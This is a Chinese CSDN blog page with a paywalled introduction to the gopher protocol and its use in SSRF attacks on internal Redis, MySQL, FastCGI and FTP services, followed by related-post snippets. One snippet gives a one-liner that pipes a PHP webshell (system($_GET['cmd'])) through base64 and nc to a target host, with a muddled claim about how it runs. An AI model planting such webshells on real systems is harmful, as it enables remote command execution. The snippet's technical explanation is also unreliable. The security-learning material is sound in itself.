【网络安全 | HTTP】 gopher协议原理、语法及利用总结

已于 2023-11-26 22:24:52 修改
阅读量1.1w 收藏 12
点赞数 2
分类专栏: 网络安全新手快速入门(附漏洞挖掘案例) 文章标签: web安全 安全 gopher协议 网络安全 脚本
于 2023-08-01 23:03:11 首次发布
原创文章,禁止转载,否则保留追究法律责任的权利。
本文链接:https://blog.csdn.net/2301_77485708/article/details/132052102
版权

什么是gopher协议

Gopher协议是一种早期的互联网协议,用于在网络上获取文本信息。它于1991年提出,旨在提供一种简单、高效的方式来浏览和访问文件。

Gopher协议使用类似于文件系统的层次结构来组织数据,其中每个项目都有一个唯一的标识符。通过Gopher客户端软件,用户可以浏览目录并选择下载或查看文件。Gopher服务器可以提供文本文件、图像文件、二进制文件等。

与HTTP相比,Gopher协议具有更简单的设计和较少的功能。它基于传输控制协议(TCP)进行通信,默认端口号为70。然而,随着万维网的崛起和HTTP的普及,Gopher协议逐渐被取代。

利用

利用gopher协议可以攻击内网的 Redis、Mysql、FastCGI、Ftp 等,也可以发送 GET、POST 请求,这可以拓宽 SSRF 的攻击面。

语法

gopher协议的格式通常为:

gopher://hostname:port/请求方法(get、post等)/path

其中࿰

了解本专栏 订阅专栏 解锁全文 超级会员免费看
网络安全 | CTF】攻防世界 very_easy_sql 解题详析(gopher协议+ssrf漏洞sql注入+盲注脚本
等风来
08-01 1万+
登录处直接注入会提示you are not an inner user, so we can not let you have identify~查看源代码发现use.php,访问后猜测该题为基于ssrf漏洞的sql注入:因此我们可构造含有gopher协议的盲注脚本,通过对use.php界面发送请求来获取flag。具体实现的方法是通过构造不同的poc来进行注入攻击,并利用时间延迟判断是否成功注入。
Linux网络协议原理
流楚丶格念的博客
07-28 4371
文章目录网络协议术语简介组成要素工作方式层次结构层次划分常用协议TCP/IP协议NetBEUIIPX/SPX协议划分网络安全协议 网络协议 网络协议为计算机网络中进行数据交换而建立的规则、标准或约定的集 合。例如,网络中一个微机用户和一个大型主机的操作员进行通信,由于这两个数据终端所用字符集不同,因此操作员所输入的命令彼此不认识. 为了能进行通信,规定每个终端都要将各自字符集中的字符先变换为标 准字符集的字符后,才进入网络传送,到达目的终端之后,再变换为该 终端字符集的字符。当然,对于不相容终端,除了需变换
关于gopher协议
xiaoka__的博客
11-09 1681
一、gopher协议的使用方法(注意请求开头加个_或任意字符),例如/_,不然会丢失一个字节) 使用Gopher协议发送一个请求,环境为:nc起一个监听,curl发送gopher请求 nc启动监听,监听2333端口: root@Ubuntu ~# nc -lp 2333 使用curl发送http请求,命令为 root@kali ~# curl gopher://192.168.17.129:2333/abcd 此时nc收到的消息为: root@Ubuntu ~# nc -lp 2333 bcd 可以发
gopher协议
qq_50613938的博客
11-02 1098
gopher协议gopher协议 :互联网上使用的分布型的文件搜集获取网络协议,是一种分布式文档传递服务。利用该服务,用户可以无缝地浏览、搜索和检索驻留在不同位置的信息 使用方法:gopher://ip:port/_payload Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端
基础知识《Gopher协议
最新发布
qq_46143339的博客
03-14 308
在万维网(WWW)普及前,Gopher曾是主要的互联网信息检索工具。其简洁的文本驱动界面和高效的层级结构使其在早期广受欢迎。然而,随着HTTP和HTML的兴起,Gopher逐渐被取代,但其设计理念(如结构化信息组织)对现代技术仍有影响。,通过TCP协议通信,默认端口为70。用户通过Gopher客户端浏览类似文件系统的目录结构,访问文本、图像等资源。Gopher是一种早期的互联网协议,设计于1991年,用于在网络上通过层次化菜单系统高效检索文本信息。
Gopher协议
qq_43665434的博客
03-26 4408
Gopher协议 本文参考Margin大佬文章 什么是Gopher协议? 定义:Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它; gopher协议支持发出GET、POST请求:可以先截获get请
gopher协议总结
unexpectedthing的博客
12-01 6621
定义 gopher协议是一种信息查0找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。利用协议可以攻击内网的 Redis、Mysql、FastCGI、Ftp等等,也可以发送 GET、POST 请求。这拓宽了 SSRF 的攻击面 利用: 攻击内网的 Redis、Mysql、FastCGI、Ftp等等,也可以发送 GET、POST 请求
史上最全网络安全面试题总结
热门推荐
03-17 2万+
新的一年,难免有不少小伙伴面临跳槽或者找工作,本文总结了常见的安全岗位面试题,方便各位复习。祝各位事业顺利,财运亨通。 php爆绝对路径方法? 单引号引起数据库报错 访问错误参数或错误路径 探针类文件如phpinfo 扫描开发未删除的测试文件 google hacking phpmyadmin报路径:/phpmyadmin/libraries/lect_lang.lib.php 利用漏洞读取配置文件找路径 恶意使用网站功能,如本地图片读取功能读取不存在图片,上传点上传不能正常导入的文件 你常用的渗
04741计算机网络原理试题及答案201404.docx
07-10
根据给定文件的信息,我们可以总结出以下相关的计算机网络知识点: ### 一、单项选择题解析 1. **拓扑结构**: - **星形拓扑**:所有的节点都通过独立的线路与中心节点(例如集线器或交换机)相连。 - **网状形...
SSRF-gopher 协议扩展利用:突破网络限制的利器
weixin_43822401的博客
06-11 945
Gopher 是一种在 HTTP 协议之前非常流行的信息查找系统,虽然现在已经被 HTTP 协议取代,但在 SSRF 漏洞利用中仍然发挥着重要作用。Gopher 协议可以将 HTTP 请求转换为 TCP 数据流,从而突破一些网络限制,例如防火墙。Gopher 协议作为 SSRF 漏洞利用的利器,可以帮助攻击者突破网络限制,实现更高级的攻击目标。为了防止 SSRF-gopher 协议漏洞,需要对用户输入进行严格的校验,并使用安全的编码和解码库。
flask-gopher:Flask扩展,支持Gopher协议
02-05
烧瓶地鼠 扩展以支持协议。 内容 演示版 在以下URL的gopherspace中提供了Flask-Gopher服务器的实时演示: gopher://mozz.us:7005 关于 什么是地鼠? Gopher是万维网的替代方案,后者在90年代初达到顶峰。 狂热者仍然维护着少数的地鼠站点。 您可以在了解有关其历史的更多信息。 什么是烧瓶球? Flask-Gopher是Flask扩展,它在内置的Web服务器周围添加了一个薄的Gopher-> HTTP兼容性层。 它允许您构建完全符合gopher服务器,并完全访问Flask的路由,模板引擎,调试器等! 这是给谁的 我创建此扩展是因为我想尝试构
Gopher协议使用总结1
08-03
1. 明尼苏达大学的吉祥物是地鼠 2. 一个跑腿的助手就像地鼠一样在地下挖洞总能到达它想要的位置 1. 如果第一个字符是 > 或者 < 那么丢弃该行字符串,表示
gopher协议及ssrf
UserNick157的博客
08-24 1302
gopher curl ssrf
CTFHUB--SRRF(上)--gopher协议
qq_75120258的博客
03-28 1055
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
SSRF之GOPHER协议利用
qq_61553520的博客
05-22 777
GOPHER协议是一种比HTTP协议还要古老的协议,默认工作端口70,但是gopher协议在SSRF漏洞利用上比HTTP协议更有优势。
SSRF深度解析Gopher协议
qq_60115503的博客
04-25 5204
定义:Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它;
Gopher协议漏洞
火柴人的博客
09-08 312
https://damit5.com/2018/05/26/SSRF-%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/ https://blog.chaitin.cn/gopher-attack-surfaces/
使用gopher协议webshell
06-06
Gopher 协议是一个老式的网络协议,它主要用于文本传输和文件下载。由于一些历史原因,Gopher 协议在一些场景下仍然有用处,例如绕过一些防火墙和安全设备。在某些情况下,可以利用 Gopher 协议来写 Webshell,从而实现远程命令执行和文件上传等功能。 下面是一个简单的 Gopher Webshell 例子: 1. 创建一个 PHP 脚本,将其编码为 base64 格式,假设文件名为 `shell.php`。 2. 将编码后的 PHP 脚本内容插入到 Gopher URL 中,形如 `gopher://hostname:port/_<base64-encoded-php-script>`。 3. 在浏览器或者 curl 等工具中访问该 Gopher URL,即可触发 PHP 脚本执行,从而实现远程命令执行和文件上传等功能。 例如,可以使用以下命令在 Linux 系统上写入一个 Gopher Webshell: ``` echo '<?php system($_GET["cmd"]) ?>' | base64 | xargs printf "GET /_%s HTTP/1.0\r\n\r\n" | nc hostname port ``` 其中,`hostname` 和 `port` 分别为目标主机和端口号,`cmd` 为远程命令执行参数。此时,访问 `gopher://hostname:port` 即可执行远程命令。 需要注意的是,使用 Gopher 协议Webshell 存在一些风险,容易被防火墙和安全设备识别和拦截。此外,由于 Gopher 协议已经过时,一些浏览器和工具可能不支持 Gopher URL。因此,在实际应用中,需要根据具体情况进行选择和调整。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值